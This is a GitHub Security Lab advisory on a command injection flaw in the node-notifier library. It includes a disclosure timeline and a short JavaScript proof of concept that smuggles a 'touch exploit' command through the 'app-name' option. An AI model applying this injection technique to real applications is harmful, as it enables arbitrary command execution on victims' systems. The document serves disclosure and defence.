Coordinated Disclosure Timeline
- 12/22/2020: Report sent to the maintainer
- 02/11/2021: Report not acknowledged, contacted the maintainer again
- 03/02/2021: Report acknowledged
- 03/11/2021: Issue fixed
Summary
node-notifier recently addressed a command injection vulnerability in https://github.com/advisories/GHSA-5fw9-fq32-wv5p, however this fix appears to be insufficient and command injection through malicious input is still possible.
Product
Tested Version
8.0.1
Details
node-notifier is a general purpose library for showing OS notifications (toasts). A client of the library expects that they can safely call the methods in node-notifier with user-controlled inputs. However, in some cases, that can lead to arbitrary command execution.
Issue 1: Insufficient input sanitization leads to command injection
Certain input fields of node-notifier are insufficiently sanitized and allow for command injection when passed as command line arguments.
The provided PoC pretends to be a client that sends malicious inputs to node-notifier.
The outcome of the PoC is that a file exploit is created in the current working directory.
- Install
node-notifier:npm install node-notifier. - Run the below with
node(tested on Ubuntu). ```JavaScript var Notify = require(‘node-notifier/notifiers/notifysend’);
var notifier = new Notify({ suppressOsdCheck: true });
var options = {
title: “titl”,
message: “msg”,
“app-name”: [“footouch exploit”]
//”category”: [“footouch exploit”]
};
notifier.notify(options, () => {});
```
Impact
Arbitrary command execution
Resources
- This issue was detected using the following CodeQL query
- Fix commit
Credit
This issue was discovered and reported by GitHub team member @erik-krogh.
Contact
You can contact the GHSL team at securitylab@github.com, please include GHSL-2020-373 in any communication regarding this issue.